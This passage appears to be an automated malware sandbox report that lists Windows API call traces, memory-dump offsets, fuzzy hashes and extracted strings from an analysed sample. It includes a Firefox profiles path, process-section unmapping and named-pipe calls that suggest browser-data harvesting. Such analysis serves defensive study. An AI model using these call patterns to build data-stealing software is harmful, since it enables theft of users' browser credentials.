    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 4915370d64bf5c115dcc7df05119504ed8106c73e5c20004021290fc9b098e04
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: A8D0126D078B4ED4D91985A715E2F03E1915F33700E3C460872607926A8B3673AEDF49
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B33
  • WriteFile.KERNEL32(00000000,?,00001000,01B37494,00000000), ref: 01B34B49
  • SetEndOfFile.KERNEL32(00000000,?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B54
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B5C
  • CloseHandle.KERNEL32(00000000), ref: 01B34B65
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: SetLastErrorSleepWaitForSingleObjectmemset
  • String ID: vids
  • API String ID: 1012678829-3767230166
  • Opcode ID: a88323ab6a07f6567de602f156fbacf356d172862014bdadb632bb7e4ac17ede
  • Instruction ID: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
  • Opcode Fuzzy Hash: E1216B4906CCE1E3D8E268440463F6D32146F83DFAD4DA72667BE9A6D75F012306D629
  • Instruction Fuzzy Hash: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
APIs
  • memset.NTDLL ref: 001DD3C6
  • SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD348: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,001DD513,?,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 001DD351
    • Part of subcall function 001DD348: _aulldiv.NTDLL(00000001,?,00002710,00000000), ref: 001DD364
  • WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
  • Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 19
  • API ID: RegCloseKeyRegOpenKeySetEventWaitForSingleObject
  • String ID: %APPDATA%\Mozilla\Firefox\Profiles
  • API String ID: 2346524515-3215297822
  • Opcode ID: 04e48ca811839595ab19984103b0a713a9098f9930145295782b9b8a8acae543
  • Instruction ID: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
  • Opcode Fuzzy Hash: 64110C72556761C8C9256C84281E37A35C3FA833D3D2C7703EDA071A8B4B8261ECBD98
  • Instruction Fuzzy Hash: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
APIs
    • Part of subcall function 001D83A0: GetProcAddress.KERNEL32(001ED992,001C6C3C,00000000), ref: 001D83B4
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
    • Part of subcall function 001C3996: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001C3996: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
    • Part of subcall function 001C3996: GetLastError.KERNEL32 ref: 001C3A9B
    • Part of subcall function 001C3996: HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
    • Part of subcall function 001C3996: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
  • SetEvent.KERNEL32(00000001,001EB1D0,?,00000000), ref: 001C6C91
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • WaitForSingleObject.KERNEL32(00000000,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C6D1E
  • RegOpenKeyA.ADVAPI32(80000001,001EC992,?), ref: 001C6D4F
  • RegCloseKey.ADVAPI32(?), ref: 001C6D77
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
    • Part of subcall function 001D9029: NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 001D905A
    • Part of subcall function 001D9029: RtlNtStatusToDosError.NTDLL(C000009A), ref: 001D9095
    • Part of subcall function 001D6D18: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
    • Part of subcall function 001D6D18: GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001D6D18: ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
    • Part of subcall function 001D6D18: GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
    • Part of subcall function 001D6D18: CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
Strings
  • %APPDATA%\Mozilla\Firefox\Profiles, xrefs: 001C6CA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 37
  • API ID: HeapFree$RtlAllocateHeaplstrcmpi
  • String ID: Main
  • API String ID: 2523190637-521822810
  • Opcode ID: f2d70ba1db336b0a4ac6973dd472b45d7992a95be766767dbdcbf8c120d66562
  • Instruction ID: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
  • Opcode Fuzzy Hash: 8DF095610946C3D35417545580B03B89004AFD22F2C4D43FAE9303D1CB7E1235D7765F
  • Instruction Fuzzy Hash: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
APIs
    • Part of subcall function 001DDAD4: memcpy.NTDLL(00000000,00000084,00000084,001CD4DC,00000000,00000000,001DDB4C,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001), ref: 001DDAF2
    • Part of subcall function 001DDAD4: memset.NTDLL ref: 001DDB24
  • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
  • lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C5816: lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
    • Part of subcall function 001C5816: HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
    • Part of subcall function 001C5816: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
    • Part of subcall function 001C5816: lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
    • Part of subcall function 001C5816: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
    • Part of subcall function 001C5816: Sleep.KERNEL32(0000000A), ref: 001C58F2
    • Part of subcall function 001C5816: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C3F4D: RegCloseKey.ADVAPI32(?,?,?,001C403B,00000000,?,?,00000000,00000000,-00000008), ref: 001C3F87
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
